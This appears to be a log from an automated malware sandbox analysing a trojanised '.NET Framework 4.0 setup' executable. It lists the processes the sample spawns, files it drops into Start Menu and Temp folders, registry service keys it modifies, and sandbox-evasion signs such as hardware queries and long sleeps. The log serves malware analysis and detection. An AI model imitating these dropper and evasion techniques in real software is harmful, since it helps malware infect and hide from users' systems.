                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess created: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe "C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe"
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeProcess created: C:\6c8944922f7b98d0b6cd82b768\Setup.exe C:\6c8944922f7b98d0b6cd82b768\\Setup.exe /x86 /x64 /ia64 /web
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo1.rtf
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C944DC9 AdjustTokenPrivileges,4_2_6C944DC9
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeFile created: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeJump to behavior
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C4A6525 __EH_prolog3_catch,CoInitialize,CoCreateInstance,CoUninitialize,__CxxThrowException@8,4_2_6C4A6525
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_0021774A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLastError,GetLogicalDriveStringsW,CharUpperW,_wcschr,GetDiskFreeSpaceExW,2_2_0021774A
                          Source: dotNetFx40_Full_setup.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C48EFE2 CreateToolhelp32Snapshot,_memset,Process32FirstW,Process32NextW,FindCloseChangeNotification,4_2_6C48EFE2
                          Source: dotNetFx40_Full_setup.exe, Program.csBase64 encoded string: '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
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeMutant created: \Sessions\1\BaseNamedObjects\Global\NetFxSetupMutex
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6752:120:WilError_03
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCommand line argument: temp2_2_002159A6
                          Source: Setup.exeString found in binary or memory: Pre-Installation Warnings:
                          Source: EQB4OREJ.exe.0.dr, PBE.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 0.2.dotNetFx40_Full_setup.exe.13314658.1.raw.unpack, PBE.csCryptographic APIs: 'TransformFinalBlock'
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MsftEdit.dll
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEWindow detected: Number of UI elements: 15
                          Source: dotNetFx40_Full_setup.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
                          Source: dotNetFx40_Full_setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: dotNetFx40_Full_setup.exeStatic file information: File size 2605056 > 1048576
                          Source: dotNetFx40_Full_setup.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x27b800
                          Source: dotNetFx40_Full_setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: sqmapi.pdb source: G5K9HNJ7.exe, 00000002.00000003.812362360.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, G5K9HNJ7.exe, 00000002.00000003.813403498.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, G5K9HNJ7.exe, 00000002.00000003.813241400.0000000000F79000.00000004.00000020.00020000.00000000.sdmp, G5K9HNJ7.exe, 00000002.00000003.813657014.0000000000F59000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.3303901253.000000006C621000.00000020.00000001.01000000.0000000B.sdmp, sqmapi.dll.2.dr
                          Source: Binary string: SetupEngine.pdb source: G5K9HNJ7.exe, 00000002.00000003.812362360.00000000056C5000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, SetupEngine.dll.2.dr
                          Source: Binary string: boxstub.pdb source: dotNetFx40_Full_setup.exe, 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmp, G5K9HNJ7.exe, G5K9HNJ7.exe, 00000002.00000003.797545019.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, G5K9HNJ7.exe, 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, G5K9HNJ7.exe, 00000002.00000000.797030009.0000000000211000.00000020.00000001.01000000.00000006.sdmp, G5K9HNJ7.exe.0.dr
                          Source: Binary string: SetupUtility.pdb source: G5K9HNJ7.exe, 00000002.00000003.812362360.00000000056C5000.00000004.00000020.00020000.00000000.sdmp, SetupUtility.exe.2.dr
                          Source: Binary string: Setup.pdb source: G5K9HNJ7.exe, 00000002.00000003.812362360.00000000056C5000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000000.815079192.0000000000031000.00000020.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.3249976406.0000000000031000.00000020.00000001.01000000.00000009.sdmp, Setup.exe.2.dr
                          Source: Binary string: SetupResources.pdb source: G5K9HNJ7.exe, 00000002.00000003.812362360.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, SetupResources.dll14.2.dr, SetupResources.dll18.2.dr, SetupResources.dll4.2.dr, SetupResources.dll9.2.dr, SetupResources.dll11.2.dr, SetupResources.dll15.2.dr, SetupResources.dll17.2.dr, SetupResources.dll13.2.dr, SetupResources.dll20.2.dr, SetupResources.dll3.2.dr, SetupResources.dll21.2.dr, SetupResources.dll22.2.dr, SetupResources.dll1.2.dr, SetupResources.dll6.2.dr, SetupResources.dll19.2.dr, SetupResources.dll7.2.dr, SetupResources.dll.2.dr, SetupResources.dll5.2.dr, SetupResources.dll16.2.dr, SetupResources.dll2.2.dr, SetupResources.dll0.2.dr, SetupResources.dll23.2.dr, SetupResources.dll8.2.dr, SetupResources.dll12.2.dr, SetupResources.dll10.2.dr
                          Source: Binary string: SetupUi.pdb source: G5K9HNJ7.exe, 00000002.00000003.812362360.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, SetupUi.dll.2.dr
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeCode function: 0_2_00007FFDA15600BD pushad ; iretd 0_2_00007FFDA15600C1
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeCode function: 0_2_00007FFDA1560248 push E95DBB98h; ret 0_2_00007FFDA1560259
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeCode function: 0_2_00007FFDA1560410 push ds; retf 0_2_00007FFDA156042A
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeCode function: 0_2_00007FFDA1562210 push eax; iretd 0_2_00007FFDA156221D
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_0022AB05 push ecx; ret 2_2_0022AB18
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_00234EE0 push ecx; ret 2_2_00234EF3
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeCode function: 3_2_00007FFDA15901B4 push ds; retf 3_2_00007FFDA15901C2
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeCode function: 3_2_00007FFDA159596D push ecx; retf 3_2_00007FFDA15959DC
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeCode function: 3_2_00007FFDA1590241 push ds; retf 3_2_00007FFDA1590242
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeCode function: 3_2_00007FFDA15900BD pushad ; iretd 3_2_00007FFDA15900C1
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeCode function: 3_2_00007FFDA159558D push cs; retf 3_2_00007FFDA1595592
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_00033DF5 push ecx; ret 4_2_00033E08
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C4B2709 push ecx; ret 4_2_6C4B271C
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C4AAA75 push ecx; ret 4_2_6C4AAA88
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C624821 push ecx; ret 4_2_6C624834
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C621B89 push ecx; ret 4_2_6C621B9C
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C976F06 push ecx; ret 4_2_6C976F19
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C96E265 push ecx; ret 4_2_6C96E278
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_0021B4B3 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0021B4B3
                          Source: dotNetFx40_Full_setup.exeStatic PE information: 0xB8EB3E69 [Mon Apr 23 16:38:01 2068 UTC]
                          Source: G5K9HNJ7.exe.0.drStatic PE information: section name: .boxld01
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\3082\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1042\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1043\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\sqmapi.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1041\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1044\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1040\SetupResources.dllJump to dropped file
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeFile created: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\3076\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1035\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1036\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\SetupEngine.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1038\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\Setup.exeJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1037\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1031\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1033\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1032\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1028\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1030\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1055\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1029\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1053\SetupResources.dllJump to dropped file
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\SetupUi.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1025\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\2070\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\2052\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\SetupUtility.exeJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1046\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1045\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1049\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1033\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1025\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1028\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1030\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1031\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1029\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1036\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1035\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1032\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1038\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1037\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1040\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1041\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1042\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1044\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1043\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1046\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1045\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1055\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1053\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\2052\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1049\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\3082\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\2070\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\3076\eula.rtfJump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dotNetFx40_Full_setup.exe.logJump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeFile created: C:\ProgramData\Start Menu\G5K9HNJ7.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NET Memory Cache 4.0\LinkageJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSDTC Bridge 3.0.0.0\LinkageJump to behavior
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C93F721 StartServiceW,4_2_6C93F721
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exe Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

                          Malware Analysis System Evasion

                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exe TID: 6820 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -35048813740048126s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -600000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -599843s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -599713s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -599604s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -599495s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -599390s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -599280s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -599159s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -599031s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -598921s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -598796s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -598687s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -598577s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -598468s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -598359s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -598250s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -598140s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -598030s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -597921s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -597812s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -597703s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -597593s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -597480s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -597375s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -597265s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -597156s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -597046s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -596937s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -596828s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -596718s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -596609s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -596500s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -596390s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -596278s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -596171s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -596062s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -595952s >= -30000s
